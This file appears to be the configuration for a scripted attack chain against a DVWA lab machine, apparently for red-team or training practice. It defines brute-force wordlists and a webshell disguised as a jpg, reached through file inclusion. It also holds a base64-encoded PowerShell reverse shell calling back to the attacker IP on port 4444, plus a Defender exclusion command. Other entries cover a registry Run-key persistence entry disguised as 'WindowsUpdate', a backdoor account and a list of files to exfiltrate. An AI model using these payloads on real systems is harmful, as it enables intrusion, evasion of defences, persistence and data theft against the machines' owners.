TARGET_IP = "192.168.0.121"
TARGET_PORT = 80
ATTACKER_IP = "192.168.0.120"
SHELL_PORT = 4444


USERNAME_WORDLIST = "wordlists/usernames.txt"
PASSWORD_WORDLIST = "wordlists/passwords.txt"

DVWA_BASE_URL = f"http://{TARGET_IP}:{TARGET_PORT}/"
DVWA_LOGIN_URL = DVWA_BASE_URL + "login.php"
DVWA_FILE_UPLOAD_URL = DVWA_BASE_URL + "vulnerabilities/upload/"
DVWA_SECURITY_LEVEL_URL = DVWA_BASE_URL + "security.php"

WEBSHELL_FILENAME = "malware/shell.jpg"
WEBSHELL_UPLOADED_PATH = f"{DVWA_BASE_URL}/hackable/{WEBSHELL_FILENAME}"
WEBSHELL_URL = f"{DVWA_BASE_URL}/hackable/{WEBSHELL_FILENAME}"
DVWA_FILE_INCLUSION_URL = DVWA_BASE_URL + "vulnerabilities/fi/?page=file://C:/xampp/htdocs/hackable/uploads/shell.jpg"

ATTACK_LOG_FILE = "logs/attack_timeline.json"

EXPLOIT = "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADAALgAxADIAMAAiACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
EXCLUDE_COMMAND = "Powershell Add-MpPreference -ExclusionPath 'C:\\xampp\\htdocs\\hackable\\uploads'"
EXPLOIT_REGISTRY = "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d \"powershell -WindowStyle Hidden C:/xampp/htdocs/hackable/uploads/putty_infected.exe\" /f"

NEW_USER = "attacker"
NEW_USER_PASSWORD = "P@ssw0rd123"

EXILFTRATION_DATA = [
    "C:/xampp/htdocs/database/sqli.db",
    "C:/xampp/htdocs/config/config.inc.php",
]

TASK_NAME = "WindowsUpdate"